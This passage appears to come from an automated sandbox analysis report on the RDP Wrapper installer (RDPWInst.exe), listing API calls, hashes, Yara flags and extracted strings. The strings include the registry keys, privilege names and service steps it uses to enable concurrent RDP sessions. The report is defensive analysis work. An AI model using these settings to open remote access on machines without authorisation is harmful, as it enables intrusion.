                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoadResource$FindFree
                                                                                • String ID:
                                                                                • API String ID: 3272429154-0
                                                                                • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                APIs
                                                                                • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                  • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                  • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                • String ID:
                                                                                • API String ID: 3216391948-0
                                                                                • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                                                • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                                                Similarity
                                                                                • API ID: InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 31276548-0
                                                                                • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                                                • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF

                                                                                Control-flow Graph
                                                                                • Graph for the function at 44373c (rendered graph omitted; the node list survived only as layout residue)
                                                                                Strings
                                                                                • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                • do not use the software., xrefs: 00443ACF
                                                                                • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                • Installer v2.5, xrefs: 0044378D
                                                                                • [*] Configuring service library..., xrefs: 00443BAD
                                                                                • LpD, xrefs: 0044374F
                                                                                • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                • license, xrefs: 00443989
                                                                                • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                • $sD, xrefs: 00443761
                                                                                • [*] Notice to user:, xrefs: 00443A61
                                                                                • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                • -l display the license agreement, xrefs: 004438B7
                                                                                • [*] Extracting files..., xrefs: 00443B4F
                                                                                • [+] Done., xrefs: 00443F83
                                                                                • USAGE:, xrefs: 00443878
                                                                                • -u uninstall wrapper, xrefs: 00443925
                                                                                • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                • [*] Uninstalling..., xrefs: 00443D0F
                                                                                • [+] Successfully installed., xrefs: 00443CA2
                                                                                • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                • [*] Checking for updates..., xrefs: 00443EB2
                                                                                • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                • [*] Restarting..., xrefs: 00443EED
                                                                                • -w get latest update for INI file, xrefs: 0044390F
                                                                                • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                • [*] Removing files..., xrefs: 00443D87
                                                                                • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                • -r force restart Terminal Services, xrefs: 00443951
                                                                                • [*] Resetting service library..., xrefs: 00443D38
                                                                                • [*] Installing..., xrefs: 00443AE5
                                                                                • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                • API String ID: 0-551293883
                                                                                • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                                                • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F

                                                                                Control-flow Graph
                                                                                • Graph for the function at 43e864 (rendered graph omitted; the node list survived only as layout residue)
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                • API String ID: 1452528299-1114397459
                                                                                • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                                                • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E

                                                                                Control-flow Graph
                                                                                • Graph for the function at 408f6c (rendered graph omitted; the node list survived only as layout residue)
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                Similarity
                                                                                • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                • API String ID: 3482678030-345420546
                                                                                • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                  • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                  • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseFlush
                                                                                • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                • API String ID: 1149308822-2563127478
                                                                                • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                • String ID: en-GB,en,en-US,
                                                                                • API String ID: 1058953229-3021119265
                                                                                • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                • GetLastError.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                • API String ID: 1809907545-775158141
                                                                                • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                                                • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                • API String ID: 1377960556-1026335874
                                                                                • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                                                • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                                                • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789

                                                                                Control-flow Graph

                                                                                APIs
